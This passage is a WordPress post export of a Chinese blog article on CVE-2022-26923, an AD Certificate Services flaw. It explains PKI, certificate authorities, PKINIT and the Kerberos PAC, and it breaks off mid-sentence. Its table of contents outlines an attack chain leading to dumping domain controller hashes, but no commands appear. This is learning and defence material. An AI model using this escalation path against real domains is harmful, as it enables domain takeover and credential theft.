{"id":1020,"date":"2023-09-21T22:42:47","date_gmt":"2023-09-21T14:42:47","guid":{"rendered":"http:\/\/weizn.net\/?p=1020"},"modified":"2026-05-08T16:51:33","modified_gmt":"2026-05-08T08:51:33","slug":"cve-2022-26923%e6%94%bb%e5%87%bb%e5%9f%9f%e6%8e%a7%e8%af%81%e4%b9%a6%e6%9c%8d%e5%8a%a1%ef%bc%88adcs%ef%bc%89","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=1020","title":{"rendered":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\" title=\"\u4e00\u3001\u80cc\u666f\u77e5\u8bc6\">\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=1020\/#1%E3%80%81PKI%E5%85%AC%E9%92%A5%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD\" title=\"1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\">1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=1020\/#2%E3%80%81CA%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E6%9C%BA%E6%9E%84\" title=\"2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\">2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=1020\/#3%E3%80%81PKINIT_Kerberos%E8%AE%A4%E8%AF%81\" title=\"3\u3001PKINIT Kerberos\u8ba4\u8bc1\">3\u3001PKINIT Kerberos\u8ba4\u8bc1<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%881%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPAC\" title=\"\uff081\uff09\u4ec0\u4e48\u662fPAC\">\uff081\uff09\u4ec0\u4e48\u662fPAC<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%882%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPKINIT\" title=\"\uff082\uff09\u4ec0\u4e48\u662fPKINIT\">\uff082\uff09\u4ec0\u4e48\u662fPKINIT<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=1020\/#4%E3%80%81%E8%AF%81%E4%B9%A6%E6%A8%A1%E6%9D%BF\" title=\"4\u3001\u8bc1\u4e66\u6a21\u677f\">4\u3001\u8bc1\u4e66\u6a21\u677f<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=1020\/#5%E3%80%81%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%86%8C\" title=\"5\u3001\u8bc1\u4e66\u6ce8\u518c\">5\u3001\u8bc1\u4e66\u6ce8\u518c<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%881%EF%BC%89%E6%99%AE%E9%80%9A%E5%9F%9F%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\" title=\"\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66\">\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=1020\/#%EF%BC%882%EF%BC%89%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\" title=\"\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66\">\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<\/a><\/li><\/ul><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\" title=\"\u4e8c\u3001\u5229\u7528\u6761\u4ef6\">\u4e8c\u3001\u5229\u7528\u6761\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=1020\/#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B\" title=\"\u4e09\u3001\u5229\u7528\u8fc7\u7a0b\">\u4e09\u3001\u5229\u7528\u8fc7\u7a0b<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=1020\/#1%E3%80%81%E5%AE%9A%E4%BD%8DADCS%E6%9C%8D%E5%8A%A1%E4%BB%A5%E5%8F%8ACA%E6%A0%B9%E8%AF%81%E4%B9%A6\" title=\"1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66\">1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=1020\/#2%E3%80%81%E5%88%9B%E5%BB%BA%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%B9%B6%E8%AE%BE%E7%BD%AEdnshostname%E5%B1%9E%E6%80%A7\" title=\"2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027\">2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=1020\/#3%E3%80%81%E4%BD%BF%E7%94%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E7%94%B3%E8%AF%B7%E8%AE%A1%E7%AE%97%E6%9C%BA%E6%A8%A1%E6%9D%BF%E8%AF%81%E4%B9%A6\" title=\"3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\">3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=1020\/#4%E3%80%81%E4%BD%BF%E7%94%A8%E8%AF%81%E4%B9%A6%E8%BF%9B%E8%A1%8Ckerberos%E8%AE%A4%E8%AF%81%E5%B9%B6%E8%8E%B7%E5%BE%97%E5%AF%B9%E5%BA%94%E7%94%A8%E6%88%B7%E7%9A%84NTLM%E5%93%88%E5%B8%8C\" title=\"4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c\">4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=1020\/#5%E3%80%81dcsync%E5%9F%9F%E6%8E%A7hash\" title=\"5\u3001dcsync\u57df\u63a7hash\">5\u3001dcsync\u57df\u63a7hash<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=1020\/#%E5%9B%9B%E3%80%81%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%A1%88\" title=\"\u56db\u3001\u52a0\u56fa\u65b9\u6848\">\u56db\u3001\u52a0\u56fa\u65b9\u6848<\/a><\/li><\/ul><\/nav><\/div>\n<div class=\"gfmr-markdown-container\"><div class=\"gfmr-markdown-source\" style=\"display: none;\">&lt;h2&gt;\u4e00\u3001\u80cc\u666f\u77e5\u8bc6&lt;\/h2&gt;\n&lt;h3&gt;1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd&lt;\/h3&gt;\n&lt;p&gt;PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002&lt;\/p&gt;\n&lt;p&gt;PKI\u7684\u57fa\u7840\u6280\u672f\u5305\u62ec\uff1a\u516c\u94a5\u52a0\u5bc6\u3001\u6570\u5b57\u7b7e\u540d\u3001\u6570\u636e\u5b8c\u6574\u6027\u673a\u5236\u3001\u6570\u5b57\u4fe1\u5c01(\u6df7\u5408\u52a0\u5bc6)\u3001\u53cc\u91cd\u6570\u5b57\u7b7e\u540d\u7b49\u3002&lt;\/p&gt;\n&lt;p&gt;PKI\u4f53\u7cfb\u80fd\u591f\u5b9e\u73b0\u7684\u529f\u80fd\u6709\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u8eab\u4efd\u9a8c\u8bc1&lt;\/li&gt;\n&lt;li&gt;\u6570\u636e\u5b8c\u6574\u6027&lt;\/li&gt;\n&lt;li&gt;\u6570\u636e\u673a\u5bc6\u6027&lt;\/li&gt;\n&lt;li&gt;\u64cd\u4f5c\u7684\u4e0d\u53ef\u5426\u8ba4\u6027&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u5fae\u8f6f\u7684\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1&lt;strong&gt;ADCS\u5c31\u662f\u5bf9PKI\u7684\u5b9e\u73b0&lt;\/strong&gt;\uff0c\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1\u80fd\u591f\u8ddf\u73b0\u6709\u7684\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u53ef\u4ee5\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\u3001\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u7b49\u3002ADCS\u63d0\u4f9b\u6240\u6709\u4e0ePKI\u76f8\u5173\u7684\u7ec4\u4ef6\u4f5c\u4e3a\u89d2\u8272\u670d\u52a1\u3002\u6bcf\u4e2a\u89d2\u8272\u670d\u52a1\u8d1f\u8d23\u8bc1\u4e66\u57fa\u7840\u67b6\u6784\u7684\u7279\u5b9a\u90e8\u5206\uff0c\u540c\u65f6\u534f\u540c\u5de5\u4f5c\u4ee5\u5f62\u6210\u5b8c\u6574\u7684\u89e3\u51b3\u65b9\u6848\u3002&lt;\/p&gt;\n&lt;h3&gt;2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784&lt;\/h3&gt;\n&lt;p&gt;CA\uff08Certificate Authority\uff0c\u8bc1\u4e66\u9881\u53d1\u673a\u6784\uff09\u662fPKI\u7cfb\u7edf\u7684\u6838\u5fc3\u3002\u5176\u4f5c\u7528\u5305\u62ec\u5904\u7406\u8bc1\u4e66\u7533\u8bf7\u3001 \u8bc1\u4e66\u53d1\u653e\u3001 \u8bc1\u4e66\u66f4\u65b0\u3001\u7ba1\u7406\u5df2\u9881\u53d1\u7684\u8bc1\u4e66\u3001\u540a\u9500\u8bc1\u4e66\u548c\u53d1\u5e03\u8bc1\u4e66\u540a\u9500\u5217\u8868(CRL)\u7b49\u3002&lt;\/p&gt;\n&lt;p&gt;Active Directory\u8bc1\u4e66\u670d\u52a1\u4e2d\u7684CA\u6709\u4f01\u4e1aCA\u548c\u72ec\u7acbCA\u3002\u4f01\u4e1aCA\u5fc5\u987b\u662f\u57df\u6210\u5458\uff0c\u5e76\u4e14\u901a\u5e38\u5904\u4e8e\u8054\u673a\u72b6\u6001\u4ee5\u9881\u53d1\u8bc1\u4e66\u6216\u8bc1\u4e66\u7b56\u7565\u3002\u800c\u72ec\u7acbCA\u53ef\u4ee5\u662f\u6210\u5458\u3001\u5de5\u4f5c\u7ec4\u6216\u57df\u3002\u72ec\u7acbCA\u4e0d\u9700\u8981ADDS\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728\u6ca1\u6709\u7f51\u7edc\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002\u4f46\u662f\u5728\u57df\u4e2d\u57fa\u672c\u90fd\u662f\u4f7f\u7528\u4f01\u4e1aCA\uff0c\u56e0\u4e3a\u4f01\u4e1aCA\u53ef\u4ee5\u548c\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u5176\u4fe1\u606f\u4e5f\u5b58\u50a8\u5728Active Directory\u6570\u636e\u5e93\u4e2d\u3002\u4f01\u4e1aCA\u652f\u6301\u57fa\u4e8e\u8bc1\u4e66\u6a21\u5757\u521b\u5efa\u8bc1\u4e66\u548c\u81ea\u52a8\u6ce8\u518c\u8bc1\u4e66\u3002&lt;\/p&gt;\n&lt;p&gt;CA\u62e5\u6709\u516c\u94a5\u548c\u79c1\u94a5\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u79c1\u94a5\u53ea\u6709CA\u77e5\u9053\uff0c\u79c1\u94a5\u7528\u4e8e\u5bf9\u9881\u53d1\u7684\u8bc1\u4e66\u8fdb\u884c\u6570\u5b57\u7b7e\u540d&lt;\/li&gt;\n&lt;li&gt;\u516c\u94a5\u4efb\u4f55\u4eba\u90fd\u53ef\u4ee5\u77e5\u9053\uff0c\u516c\u94a5\u7528\u4e8e\u9a8c\u8bc1\u8bc1\u4e66\u662f\u5426\u7531CA\u9881\u53d1&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;h3&gt;3\u3001PKINIT Kerberos\u8ba4\u8bc1&lt;\/h3&gt;\n&lt;p&gt;\u4e00\u822c\u60c5\u51b5\u4e0bKerberos\u534f\u8bae\u5728AS-REQ\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\uff0c\u662f\u901a\u8fc7\u7528\u6237hash\u52a0\u5bc6\u65f6\u95f4\u6233\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002\u4f46ADCS\u670d\u52a1\u53ef\u4ee5\u548cADDS\u7d27\u5bc6\u642d\u914d\u4f7f\u7528\uff0c\u6240\u4ee5\u5229\u7528\u8bc1\u4e66\u4e5f\u53ef\u4ee5\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002&lt;\/p&gt;\n&lt;blockquote&gt;\n&lt;p&gt;&lt;a href=&quot;https:\/\/www.rfc-editor.org\/rfc\/rfc4556.html&quot;&gt;RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)&lt;\/a&gt; \u5f15\u5165\u4e86\u5bf9Kerberos\u9884\u8eab\u4efd\u9a8c\u8bc1\u7684\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u652f\u6301\uff0c\u53ef\u4ee5\u4f7f\u7528\u8bc1\u4e66\u7684\u79c1\u94a5\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002&lt;\/p&gt;\n&lt;\/blockquote&gt;\n&lt;p&gt;\u6b64\u5916\uff0c\u4e3a\u4e86\u652f\u6301\u8fde\u63a5\u5230\u4e0d\u652f\u6301Kerberos\u8eab\u4efd\u9a8c\u8bc1\u7684\u7f51\u7edc\u670d\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u7684NTLM\u8eab\u4efd\u9a8c\u8bc1\uff0cKDC\u4f1a\u5728PAC\u7279\u6743\u5c5e\u6027\u8bc1\u4e66\u7684PAC_CREDENTIAL_INFO\u7f13\u51b2\u533a\u4e2d\u8fd4\u56de\u7528\u6237\u7684NTLM Hash\uff0c\u4e5f\u5c31\u662f\u8bf4\u5f53\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884cKerberos\u8ba4\u8bc1\u65f6\uff0c\u8fd4\u56de\u7684\u7968\u636e\u7684PAC\u4e2d\u662f\u5305\u542b\u7528\u6237\u7684NTLM Hash\u7684\uff0c\u800c\u4e14\u65e0\u8bba\u4ee5\u540e\u7528\u6237\u5982\u4f55\u66f4\u6539\u5bc6\u7801\uff0c\u8fd4\u56de\u7684NTLM Hash\u90fd\u662f\u5f53\u524d\u7528\u6237\u6700\u65b0\u7684\u3002&lt;\/p&gt;\n&lt;h4&gt;\uff081\uff09\u4ec0\u4e48\u662fPAC&lt;\/h4&gt;\n&lt;p&gt;PAC \u901a\u5e38\u6307\u7684\u662f &quot;Privilege Attribute Certificate&quot;\uff0c\u5b83\u4e0eKerberos\u8ba4\u8bc1\u534f\u8bae\u76f8\u5173\u3002\u5728Active Directory\u73af\u5883\u4e2d\uff0c\u5f53\u7528\u6237\u6216\u670d\u52a1\u4f7f\u7528Kerberos\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0cPAC\u5305\u542b\u5728Kerberos\u7968\u8bc1\u4e2d\uff08\u7279\u522b\u662f\u5728TGT\u548cservice ticket\u4e2d\uff09\u3002&lt;\/p&gt;\n&lt;p&gt;\u4ee5\u4e0b\u662fPAC\u7684\u4e3b\u8981\u7279\u70b9\u548c\u5185\u5bb9\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7528\u6237\u7684\u5b89\u5168\u6807\u8bc6\u7b26 (SID)&lt;\/strong&gt;\uff1a\u8fd9\u662f\u7528\u6237\u7684\u552f\u4e00\u6807\u8bc6\u7b26\uff0c\u4ee5\u53ca\u7528\u6237\u6240\u5c5e\u7684\u6240\u6709\u7ec4\u7684SID\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7528\u6237\u7684\u6743\u9650\u548c\u7ec4\u6210\u5458\u8d44\u683c&lt;\/strong&gt;\uff1a\u8fd9\u5305\u62ec\u7528\u6237\u5728\u57df\u4e2d\u7684\u6240\u6709\u7ec4\u6210\u5458\u8d44\u683c\uff0c\u65e0\u8bba\u5b83\u4eec\u662f\u76f4\u63a5\u7684\u8fd8\u662f\u5d4c\u5957\u7684\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u8eab\u4efd\u9a8c\u8bc1\u4fe1\u606f&lt;\/strong&gt;\uff1aPAC\u5305\u542b\u5173\u4e8e\u7528\u6237\u7684\u5176\u4ed6\u9a8c\u8bc1\u4fe1\u606f\uff0c\u8fd9\u6709\u52a9\u4e8e\u670d\u52a1\u786e\u5b9a\u7528\u6237\u7684\u8eab\u4efd\u548c\u6743\u9650\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u52a0\u5bc6&lt;\/strong&gt;\uff1a\u4e3a\u4e86\u4fdd\u8bc1\u5b89\u5168\uff0cPAC\u7684\u5185\u5bb9\u662f\u52a0\u5bc6\u7684\uff0c\u53ea\u6709\u5177\u6709\u6b63\u786e\u5bc6\u94a5\u7684\u670d\u52a1\u624d\u80fd\u89e3\u5bc6\u5b83\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;PAC\u7684\u5b58\u5728\u6709\u52a9\u4e8e\u63d0\u9ad8\u6548\u7387\uff0c\u56e0\u4e3a\u4e00\u65e6\u7528\u6237\u5f97\u5230\u4e00\u4e2aKerberos\u7968\u636e\uff0c\u4ed6\u4eec\u5c31\u4e0d\u9700\u8981\u518d\u6b21\u67e5\u8be2Active Directory\u6765\u786e\u5b9a\u4ed6\u4eec\u7684\u6743\u9650\u6216\u7ec4\u6210\u5458\u8d44\u683c\u3002\u76f8\u53cd\uff0c\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5305\u542b\u5728PAC\u4e2d\uff0c\u5e76\u968f\u7968\u636e\u4e00\u8d77\u53d1\u9001\u3002&lt;\/p&gt;\n&lt;p&gt;\u7136\u800c\uff0cPAC\u4e5f\u53ef\u80fd\u589e\u52a0\u7968\u636e\u7684\u5927\u5c0f\uff0c\u7279\u522b\u662f\u5f53\u7528\u6237\u662f\u5f88\u591a\u7ec4\u7684\u6210\u5458\u65f6\u3002\u8fd9\u53ef\u80fd\u4f1a\u5bfc\u81f4\u4e00\u4e9b\u95ee\u9898\uff0c\u4f8b\u5982\u5982\u679c\u7968\u636e\u592a\u5927\u800c\u4e0d\u80fd\u9002\u5e94\u7f51\u7edc\u5305\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6709\u65f6\u53ef\u80fd\u9700\u8981\u8c03\u6574\u76f8\u5173\u7684\u914d\u7f6e\u6216\u51cf\u5c11\u7528\u6237\u7684\u7ec4\u6210\u5458\u8d44\u683c\u3002&lt;\/p&gt;\n&lt;p&gt;\u603b\u7684\u6765\u8bf4\uff0cPAC\u662fKerberos\u5728Active Directory\u73af\u5883\u4e2d\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u6210\u90e8\u5206\uff0c\u5b83\u5e2e\u52a9\u670d\u52a1\u5feb\u901f\u786e\u5b9a\u7528\u6237\u7684\u6743\u9650\u548c\u8eab\u4efd\uff0c\u800c\u65e0\u9700\u518d\u6b21\u67e5\u8be2AD\u3002&lt;\/p&gt;\n&lt;h4&gt;\uff082\uff09\u4ec0\u4e48\u662fPKINIT&lt;\/h4&gt;\n&lt;p&gt;PKINIT\uff08Public Key Cryptography for Initial Authentication\uff09\u662fKerberos\u8eab\u4efd\u9a8c\u8bc1\u534f\u8bae\u7684\u4e00\u4e2a\u6269\u5c55\u3002\u5b83\u5141\u8bb8Kerberos\u7684\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u6280\u672f\uff0c\u800c\u4e0d\u662f\u4f20\u7edf\u7684\u5bc6\u7801\u3002&lt;\/p&gt;\n&lt;p&gt;\u5177\u4f53\u6765\u8bf4\uff0c\u8fd9\u662f\u5982\u4f55\u5de5\u4f5c\u7684\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u516c\u94a5\u8bc1\u4e66&lt;\/strong&gt;\uff1a\u5728PKINIT\u4e2d\uff0c\u7528\u6237\u6216\u670d\u52a1\u62e5\u6709\u4e00\u4e2a\u516c\u94a5\u8bc1\u4e66\uff08\u901a\u5e38\u662fX.509\u683c\u5f0f\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1&lt;\/strong&gt;\uff1a\u5f53\u7528\u6237\u5c1d\u8bd5\u8fdb\u884cKerberos\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u4ed6\u4eec\u53ef\u4ee5\u4f7f\u7528\u5176\u79c1\u94a5\u5bf9\u67d0\u4e9b\u4fe1\u606f\u8fdb\u884c\u7b7e\u540d\uff0c\u7136\u540e\u5c06\u7b7e\u540d\u7684\u4fe1\u606f\u4e0e\u5176\u516c\u94a5\u8bc1\u4e66\u4e00\u8d77\u53d1\u9001\u7ed9KDC\uff08Key Distribution Center\uff09\u3002KDC\u9a8c\u8bc1\u7b7e\u540d\u5e76\u68c0\u67e5\u8bc1\u4e66\u7684\u6709\u6548\u6027\uff08\u901a\u5e38\u4e0e\u4fe1\u4efb\u7684\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u5217\u8868\u8fdb\u884c\u6bd4\u8f83\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;&lt;strong&gt;\u7968\u636e\u9881\u53d1&lt;\/strong&gt;\uff1a\u4e00\u65e6KDC\u9a8c\u8bc1\u4e86\u7528\u6237\u7684\u8eab\u4efd\uff0c\u5b83\u5c06\u50cf\u5f80\u5e38\u4e00\u6837\u9881\u53d1\u4e00\u4e2aTGT\uff08Ticket Granting Ticket\uff09\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u8fd9\u79cd\u65b9\u6cd5\u7684\u597d\u5904\u662f\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;\u589e\u5f3a\u7684\u5b89\u5168\u6027&lt;\/strong&gt;\uff1a\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u63d0\u4f9b\u4e86\u6bd4\u4f20\u7edf\u5bc6\u7801\u66f4\u5f3a\u5927\u7684\u5b89\u5168\u6027\u3002&lt;\/li&gt;\n&lt;li&gt;&lt;strong&gt;\u667a\u80fd\u5361\u652f\u6301&lt;\/strong&gt;\uff1aPKINIT\u5e38\u5e38\u4e0e\u667a\u80fd\u5361\u7ed3\u5408\u4f7f\u7528\u3002\u7528\u6237\u7684\u8bc1\u4e66\u548c\u79c1\u94a5\u5b58\u50a8\u5728\u667a\u80fd\u5361\u4e0a\uff0c\u4f7f\u5f97\u8eab\u4efd\u9a8c\u8bc1\u8fc7\u7a0b\u66f4\u4e3a\u5b89\u5168\u3002&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u7f3a\u70b9\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;\u590d\u6742\u6027&lt;\/strong&gt;\uff1a\u90e8\u7f72\u548c\u7ba1\u7406PKI\uff08Public Key 